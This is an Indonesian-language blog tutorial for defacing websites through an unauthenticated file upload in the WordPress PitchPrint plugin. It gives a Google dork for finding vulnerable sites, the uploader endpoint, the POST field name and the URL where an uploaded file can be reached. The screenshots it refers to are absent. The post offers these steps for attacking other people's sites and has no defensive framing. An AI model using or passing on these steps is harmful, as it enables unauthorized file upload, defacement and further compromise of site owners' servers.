Deface Metode Wordpress Plugins PitchPrint

Dvn404
December 16, 2020

Assalamualaikum.
Hello Sob .



Kali ini gw akan ngasih tutorial Deface, Proof Of Concept : Wordpress Plugins PitchPrint
langsung aja yak,

========================================

Google Dork : inurl:/wp-content/plugins/pitchprint/

Exploit : /wp-content/plugins/pitchprint/uploader/

========================================







Vulnerability ? See the picture above









Masuk ke CSRF.

Post File : files[]









Uploaded. Jika Terupload Tampilan akan seperti diatas.












Akses File ?

www.site.com/wp-content/plugins/pitchprint/uploader/files/yourfile.ext

Cukup sekian, tutor yang Simple bgt ini :v
jika ada kesalahan, gw minta maap.
See You ..



Wassalamualaikum